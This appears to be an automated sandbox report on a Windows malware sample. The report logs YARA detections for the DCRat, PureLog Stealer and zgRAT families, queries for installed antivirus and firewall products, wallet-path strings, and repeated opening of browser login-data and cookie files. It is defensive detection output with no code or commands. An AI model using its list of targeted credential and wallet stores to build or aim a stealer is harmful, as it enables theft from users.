                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EADF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00EADF1E
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E9B146 GetVersionExW,0_2_00E9B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1756943981.0000000012994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: ChainFontruntimeCrt.exe PID: 7412, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: yeeQesPXxpnDuwPWqTnUoVbi.exe PID: 7664, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 8k1e14tjcx.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.8k1e14tjcx.exe.58c6709.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.ChainFontruntimeCrt.exe.210000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.8k1e14tjcx.exe.6f7e709.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.8k1e14tjcx.exe.6f7e709.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000004.00000000.1706629169.0000000000212000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1697920956.0000000005878000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1696822133.0000000006F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 8k1e14tjcx.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.8k1e14tjcx.exe.58c6709.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.ChainFontruntimeCrt.exe.210000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.8k1e14tjcx.exe.6f7e709.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.8k1e14tjcx.exe.6f7e709.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, type: DROPPED
                                    Found many strings related to Crypto-Wallets (likely being stolen)
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                                    Source: ChainFontruntimeCrt.exe, 00000004.00000002.1754509420.0000000002888000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                                    Source: ChainFontruntimeCrt.exe, 00000004.00000002.1754509420.0000000002888000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno:Exodus
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                                    Source: 8k1e14tjcx.exe, 00000000.00000003.1696822133.0000000006F30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
